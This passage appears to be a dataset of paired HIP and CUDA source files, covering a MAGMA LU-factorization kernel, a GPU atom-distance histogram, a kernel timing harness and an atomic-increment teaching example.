max_id = smax_id[ 0 ]; __syncthreads(); // now every thread in the i^th block has the maximum if( tx == 0){ if( rx_abs_max == MAGMA_D_ZERO){ magmablas_iatomic_exchange( (magma_int_t*)info, (magma_int_t)(max_id + gbstep + 1) ); } magmablas_iatomic_exchange((magma_int_t*)&ipiv[i], (magma_int_t)(max_id+1) ); // fortran indexing } __syncthreads(); if( rx_abs_max == MAGMA_D_ZERO )return; } else{ // other thread blocks are waiting if(tx == 0){ max_id = 0; while( max_id == 0 ){ max_id = ipiv[i]; }; smax_id[ 0 ] = max_id; } __syncthreads(); max_id = smax_id[ 0 ]; max_id -= 1; // revert fortran indexing __syncthreads(); if( (*info) != 0 ) return; } // swap // swap always happens between page 0 and page x // to avoid spilling rA to local memory, we use shared memory if( max_id != i){ // all blocks swap in registers // for bx < i, the column is already written in memory, // but we have a copy in reg., so continue to swap in reg., // and do one final write to memory #pragma unroll for(int j = 0; j < NPAGES; j++){ if( j == (max_id/TX) ){ sx[ tx ] = rA[j]; __syncthreads(); if( tx == i ){ magmaFloatComplex tmp = sx[ max_id%TX ]; sx[ max_id%TX ] = rA[0]; rA[0] = tmp; } __syncthreads(); if( tx == max_id%TX ){ rA[j] = sx[ tx ]; } __syncthreads(); } } //__syncthreads(); } // the ith block does scal if(bx == i){ magmaFloatComplex reg = MAGMA_C_DIV(MAGMA_C_ONE, rx_max ); // scal if( tx > i ){ rA[0] *= reg; } #pragma unroll for(int j = 1; j < NPAGES; j++){ rA[j] *= reg; } // write column i to global memory #pragma unroll for(int j = 0; j < NPAGES-1; j++){ dA[ j * TX ] = rA[j]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } __threadfence(); __syncthreads(); // after cuda 9.0, both are needed, not sure why if(tx == 0) magmablas_iatomic_exchange( (int *)&update_flag[ i ], 1); } // thread blocks with ID larger than i perform ger if(bx > i){ if( tx == i ){ sreg = rA[0]; } // wait for scal if( tx == 0){ flag = 0; while( flag == 0 ){ flag = update_flag[ i ]; }; } __syncthreads(); magmaFloatComplex reg = sreg; if( NPAGES == 1){ if(tx > i && tx < m_){ rA[0] -= da[ i * ldda + tx ] * reg; } }else{ if(tx > i){ rA[0] -= da[ i * ldda + tx ] * reg; } } #pragma unroll for(int j = 1; j < NPAGES-1; j++){ rA[j] -= da[ i * ldda + j * TX + tx ] * reg; } if( NPAGES > 1){ if( tx < m_ ){ rA[ NPAGES-1 ] -= da[ i * ldda + (NPAGES-1)*TX + tx ] * reg; } } } } // all blocks write their columns again except the last one if( bx < n-1 ){ #pragma unroll for(int i = 0; i < NPAGES-1; i++){ dA[ i * TX ] = rA[i]; } if( tx < m_){ dA[ (NPAGES-1) * TX ] = rA[NPAGES-1]; } } } // ============================================================================= extern "C" magma_int_t magma_cgetf2_native_fused( magma_int_t m, magma_int_t n, magmaFloatComplex_ptr dA, magma_int_t ldda, magma_int_t *ipiv, magma_int_t gbstep, magma_int_t *flags, magma_int_t *info, magma_queue_t queue ) { magma_int_t arginfo = 0; const magma_int_t ntx = CGETF2_FUSED_NTH; if( m < n || m > CGETF2_FUSED_MAX_M ){ arginfo = -1; } else if( n > magma_getdevice_multiprocessor_count() ){ arginfo = -2; } else if( ldda < max(1, m) ){ arginfo = -4; } if (arginfo != 0) { magma_xerbla( __func__, -(arginfo) ); return arginfo; } magma_int_t arch = magma_getdevice_arch(); dim3 grid(n, 1, 1); dim3 threads(ntx, 1, 1); const magma_int_t npages = magma_ceildiv(m, ntx); // the kernel uses communication among thread blocks // as a safeguard, force one thread block per multiprocessor // by allocating more than half the shared memory magma_int_t shmem = magma_getdevice_shmem_block(); shmem = (shmem / 2); int *update_flag = (int*) flags; // update_flag is an int, not magma_int_t cgetf2_native_init_kernel<<< 1, max(n,npages), 0, queue->cuda_stream() >>>( n, npages, ipiv, update_flag); // The case statement should cover up to ( xGETF2_CHAIN_MAX_M / ntx ) switch(npages){ case 1: cgetf2_native_kernel< ntx, 1><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 2: cgetf2_native_kernel< ntx, 2><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 3: cgetf2_native_kernel< ntx, 3><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 4: cgetf2_native_kernel< ntx, 4><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 5: cgetf2_native_kernel< ntx, 5><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 6: cgetf2_native_kernel< ntx, 6><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 7: cgetf2_native_kernel< ntx, 7><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 8: cgetf2_native_kernel< ntx, 8><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 9: cgetf2_native_kernel< ntx, 9><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 10: cgetf2_native_kernel< ntx, 10><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 11: cgetf2_native_kernel< ntx, 11><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 12: cgetf2_native_kernel< ntx, 12><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 13: cgetf2_native_kernel< ntx, 13><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 14: cgetf2_native_kernel< ntx, 14><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 15: cgetf2_native_kernel< ntx, 15><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 16: cgetf2_native_kernel< ntx, 16><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 17: cgetf2_native_kernel< ntx, 17><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 18: cgetf2_native_kernel< ntx, 18><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 19: cgetf2_native_kernel< ntx, 19><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 20: cgetf2_native_kernel< ntx, 20><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #if defined(PRECISION_s) || defined(PRECISION_d) case 21: cgetf2_native_kernel< ntx, 21><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 22: cgetf2_native_kernel< ntx, 22><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 23: cgetf2_native_kernel< ntx, 23><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 24: cgetf2_native_kernel< ntx, 24><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 25: cgetf2_native_kernel< ntx, 25><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 26: cgetf2_native_kernel< ntx, 26><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 27: cgetf2_native_kernel< ntx, 27><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 28: cgetf2_native_kernel< ntx, 28><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 29: cgetf2_native_kernel< ntx, 29><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 30: cgetf2_native_kernel< ntx, 30><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 31: cgetf2_native_kernel< ntx, 31><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 32: cgetf2_native_kernel< ntx, 32><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 33: cgetf2_native_kernel< ntx, 33><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 34: cgetf2_native_kernel< ntx, 34><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 35: cgetf2_native_kernel< ntx, 35><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 36: cgetf2_native_kernel< ntx, 36><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 37: cgetf2_native_kernel< ntx, 37><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 38: cgetf2_native_kernel< ntx, 38><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 39: cgetf2_native_kernel< ntx, 39><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 40: cgetf2_native_kernel< ntx, 40><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 41: cgetf2_native_kernel< ntx, 41><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 42: cgetf2_native_kernel< ntx, 42><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 43: cgetf2_native_kernel< ntx, 43><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 44: cgetf2_native_kernel< ntx, 44><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 45: cgetf2_native_kernel< ntx, 45><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 46: cgetf2_native_kernel< ntx, 46><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 47: cgetf2_native_kernel< ntx, 47><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 48: cgetf2_native_kernel< ntx, 48><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 49: cgetf2_native_kernel< ntx, 49><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 50: cgetf2_native_kernel< ntx, 50><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) || defined(PRECISION_d) #if defined(PRECISION_s) case 51: cgetf2_native_kernel< ntx, 51><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 52: cgetf2_native_kernel< ntx, 52><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 53: cgetf2_native_kernel< ntx, 53><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 54: cgetf2_native_kernel< ntx, 54><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 55: cgetf2_native_kernel< ntx, 55><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 56: cgetf2_native_kernel< ntx, 56><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 57: cgetf2_native_kernel< ntx, 57><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 58: cgetf2_native_kernel< ntx, 58><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 59: cgetf2_native_kernel< ntx, 59><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 60: cgetf2_native_kernel< ntx, 60><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 61: cgetf2_native_kernel< ntx, 61><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 62: cgetf2_native_kernel< ntx, 62><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 63: cgetf2_native_kernel< ntx, 63><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 64: cgetf2_native_kernel< ntx, 64><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 65: cgetf2_native_kernel< ntx, 65><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 66: cgetf2_native_kernel< ntx, 66><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 67: cgetf2_native_kernel< ntx, 67><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 68: cgetf2_native_kernel< ntx, 68><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 69: cgetf2_native_kernel< ntx, 69><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 70: cgetf2_native_kernel< ntx, 70><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 71: cgetf2_native_kernel< ntx, 71><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 72: cgetf2_native_kernel< ntx, 72><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 73: cgetf2_native_kernel< ntx, 73><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 74: cgetf2_native_kernel< ntx, 74><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 75: cgetf2_native_kernel< ntx, 75><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 76: cgetf2_native_kernel< ntx, 76><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 77: cgetf2_native_kernel< ntx, 77><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 78: cgetf2_native_kernel< ntx, 78><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 79: cgetf2_native_kernel< ntx, 79><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; case 80: cgetf2_native_kernel< ntx, 80><<<grid, threads, shmem, queue->cuda_stream() >>>( m, n, dA, ldda, ipiv, gbstep, update_flag, info); break; #endif // defined(PRECISION_s) default: printf("size not supported \n"); } return 0; }
bf6854918321a6e5cabb9d8840b3cc8ae451822d.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "includes.h" /* ================================================================== Programmers: Kevin Wagner Elijah Malaby John Casey Omptimizing SDH histograms for input larger then global memory ================================================================== */ #define BOX_SIZE 23000 /* size of the data box on one dimension */ /* descriptors for single atom in the tree */ typedef struct atomdesc { float x_pos; float y_pos; float z_pos; } atom; unsigned long long * histogram; /* list of all buckets in the histogram */ unsigned long long PDH_acnt; /* total number of data points */ int block_size; /* Number of threads per block */ int num_buckets; /* total number of buckets in the histogram */ float PDH_res; /* value of w */ atom * atom_list; /* list of all data points */ unsigned long long * histogram_GPU; unsigned long long * temp_histogram_GPU; atom * atom_list_GPU; __device__ void block_to_block (atom * block_a, atom * block_b, int b_length, unsigned long long * histogram, float resolution) { atom me = block_a[threadIdx.x]; for(int i = 0; i < b_length; i++) atomicAdd(&(histogram[(int)(sqrt((me.x_pos - block_b[i].x_pos) * (me.x_pos - block_b[i].x_pos) + (me.y_pos - block_b[i].y_pos) * (me.y_pos - block_b[i].y_pos) + (me.z_pos - block_b[i].z_pos) * (me.z_pos - block_b[i].z_pos)) / resolution)]), 1); } __global__ void GPUKernelFunction (unsigned long long PDH_acnt, float PDH_res, atom * atom_list_GPU, unsigned long long * histogram_GPU, int num_buckets) { extern __shared__ unsigned long long SHist[]; /* assign register values */ int i, h_pos; float dist; atom * my_block = &atom_list_GPU[blockIdx.x * blockDim.x]; atom temp_atom_1 = my_block[threadIdx.x]; for(h_pos=threadIdx.x; h_pos < num_buckets; h_pos+=blockDim.x) SHist[h_pos] = 0; __syncthreads(); /* loop through all points in atom list calculating distance from current point to all further points */ for (i = threadIdx.x + 1; i < blockDim.x && i+blockIdx.x*blockDim.x < PDH_acnt; i++) { atom temp_atom_2 = my_block[i]; dist = sqrt((temp_atom_1.x_pos - temp_atom_2.x_pos) * (temp_atom_1.x_pos - temp_atom_2.x_pos) + (temp_atom_1.y_pos - temp_atom_2.y_pos) * (temp_atom_1.y_pos - temp_atom_2.y_pos) + (temp_atom_1.z_pos - temp_atom_2.z_pos) * (temp_atom_1.z_pos - temp_atom_2.z_pos)); h_pos = (int)(dist / PDH_res); atomicAdd(&(SHist[h_pos]), 1); } __syncthreads(); for(i=blockIdx.x+1; i < gridDim.x-1; i++) block_to_block(my_block, &atom_list_GPU[i*blockDim.x], blockDim.x, SHist, PDH_res); block_to_block(my_block, &atom_list_GPU[i*blockDim.x], PDH_acnt-i*blockDim.x, // Last block may be small SHist, PDH_res); __syncthreads(); for(h_pos = threadIdx.x; h_pos < num_buckets; h_pos += blockDim.x) *(histogram_GPU+(num_buckets*blockIdx.x)+h_pos) += SHist[h_pos]; }
bf6854918321a6e5cabb9d8840b3cc8ae451822d.cu
#include "includes.h" /* ================================================================== Programmers: Kevin Wagner Elijah Malaby John Casey Omptimizing SDH histograms for input larger then global memory ================================================================== */ #define BOX_SIZE 23000 /* size of the data box on one dimension */ /* descriptors for single atom in the tree */ typedef struct atomdesc { float x_pos; float y_pos; float z_pos; } atom; unsigned long long * histogram; /* list of all buckets in the histogram */ unsigned long long PDH_acnt; /* total number of data points */ int block_size; /* Number of threads per block */ int num_buckets; /* total number of buckets in the histogram */ float PDH_res; /* value of w */ atom * atom_list; /* list of all data points */ unsigned long long * histogram_GPU; unsigned long long * temp_histogram_GPU; atom * atom_list_GPU; __device__ void block_to_block (atom * block_a, atom * block_b, int b_length, unsigned long long * histogram, float resolution) { atom me = block_a[threadIdx.x]; for(int i = 0; i < b_length; i++) atomicAdd(&(histogram[(int)(sqrt((me.x_pos - block_b[i].x_pos) * (me.x_pos - block_b[i].x_pos) + (me.y_pos - block_b[i].y_pos) * (me.y_pos - block_b[i].y_pos) + (me.z_pos - block_b[i].z_pos) * (me.z_pos - block_b[i].z_pos)) / resolution)]), 1); } __global__ void GPUKernelFunction (unsigned long long PDH_acnt, float PDH_res, atom * atom_list_GPU, unsigned long long * histogram_GPU, int num_buckets) { extern __shared__ unsigned long long SHist[]; /* assign register values */ int i, h_pos; float dist; atom * my_block = &atom_list_GPU[blockIdx.x * blockDim.x]; atom temp_atom_1 = my_block[threadIdx.x]; for(h_pos=threadIdx.x; h_pos < num_buckets; h_pos+=blockDim.x) SHist[h_pos] = 0; __syncthreads(); /* loop through all points in atom list calculating distance from current point to all further points */ for (i = threadIdx.x + 1; i < blockDim.x && i+blockIdx.x*blockDim.x < PDH_acnt; i++) { atom temp_atom_2 = my_block[i]; dist = sqrt((temp_atom_1.x_pos - temp_atom_2.x_pos) * (temp_atom_1.x_pos - temp_atom_2.x_pos) + (temp_atom_1.y_pos - temp_atom_2.y_pos) * (temp_atom_1.y_pos - temp_atom_2.y_pos) + (temp_atom_1.z_pos - temp_atom_2.z_pos) * (temp_atom_1.z_pos - temp_atom_2.z_pos)); h_pos = (int)(dist / PDH_res); atomicAdd(&(SHist[h_pos]), 1); } __syncthreads(); for(i=blockIdx.x+1; i < gridDim.x-1; i++) block_to_block(my_block, &atom_list_GPU[i*blockDim.x], blockDim.x, SHist, PDH_res); block_to_block(my_block, &atom_list_GPU[i*blockDim.x], PDH_acnt-i*blockDim.x, // Last block may be small SHist, PDH_res); __syncthreads(); for(h_pos = threadIdx.x; h_pos < num_buckets; h_pos += blockDim.x) *(histogram_GPU+(num_buckets*blockIdx.x)+h_pos) += SHist[h_pos]; }
1e463580780e705d4f396e1f13c81224cbc1f276.hip
// !!! This is a file automatically generated by hipify!!! #include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <hiprand/hiprand_kernel.h> #include <stdlib.h> #include <hip/hip_runtime.h> #include <sys/time.h> #include "vector_atan2.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { hipSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const int n = 1; const REAL *x = NULL; hipMalloc(&x, XSIZE*YSIZE); const int offset_x = 1; const int stride_x = 1; const REAL *y = NULL; hipMalloc(&y, XSIZE*YSIZE); const int offset_y = 1; const int stride_y = 1; REAL *z = NULL; hipMalloc(&z, XSIZE*YSIZE); const int offset_z = 1; const int stride_z = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); hipFree(0);hipLaunchKernelGGL(( vector_atan2), dim3(gridBlock),dim3(threadBlock), 0, 0, n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); hipDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {hipLaunchKernelGGL(( vector_atan2), dim3(gridBlock),dim3(threadBlock), 0, 0, n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {hipLaunchKernelGGL(( vector_atan2), dim3(gridBlock),dim3(threadBlock), 0, 0, n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
1e463580780e705d4f396e1f13c81224cbc1f276.cu
#include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <curand_kernel.h> #include <stdlib.h> #include <cuda.h> #include <sys/time.h> #include "vector_atan2.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { cudaSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const int n = 1; const REAL *x = NULL; cudaMalloc(&x, XSIZE*YSIZE); const int offset_x = 1; const int stride_x = 1; const REAL *y = NULL; cudaMalloc(&y, XSIZE*YSIZE); const int offset_y = 1; const int stride_y = 1; REAL *z = NULL; cudaMalloc(&z, XSIZE*YSIZE); const int offset_z = 1; const int stride_z = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); cudaFree(0); vector_atan2<<<gridBlock,threadBlock>>>(n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); cudaDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) { vector_atan2<<<gridBlock,threadBlock>>>(n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) { vector_atan2<<<gridBlock,threadBlock>>>(n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
967448877ab1326b91fb569940f37db69888ad73.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include "gputimer.h" #define NUM_THREADS 10000000 #define ARRAY_SIZE 100 #define BLOCK_WIDTH 1000 void print_array(int *array, int size) { printf("{ "); for (int i = 0; i < size; i++) { printf("%d ", array[i]); } printf("}\n"); } __global__ void increment_naive(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; g[i] = g[i] + 1; } __global__ void increment_atomic(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; atomicAdd(& g[i], 1); } int main(int argc,char **argv) { GpuTimer timer; printf("%d total threads in %d blocks writing into %d array elements\n", NUM_THREADS, NUM_THREADS / BLOCK_WIDTH, ARRAY_SIZE); // declare and allocate host memory int h_array[ARRAY_SIZE]; const int ARRAY_BYTES = ARRAY_SIZE * sizeof(int); // declare, allocate, and zero out GPU memory int * d_array; hipMalloc((void **) &d_array, ARRAY_BYTES); hipMemset((void *) d_array, 0, ARRAY_BYTES); // launch the kernel - comment out one of these timer.Start(); // Instructions: This program is needed for the next quiz // uncomment increment_naive to measure speed and accuracy // of non-atomic increments or uncomment increment_atomic to // measure speed and accuracy of atomic icrements // increment_naive<<<NUM_THREADS/BLOCK_WIDTH, BLOCK_WIDTH>>>(d_array); hipLaunchKernelGGL(( increment_atomic), dim3(NUM_THREADS/BLOCK_WIDTH), dim3(BLOCK_WIDTH), 0, 0, d_array); timer.Stop(); // copy back the array of sums from GPU and print hipMemcpy(h_array, d_array, ARRAY_BYTES, hipMemcpyDeviceToHost); print_array(h_array, ARRAY_SIZE); printf("Time elapsed = %g ms\n", timer.Elapsed()); // free GPU memory allocation and exit hipFree(d_array); return 0; }
967448877ab1326b91fb569940f37db69888ad73.cu
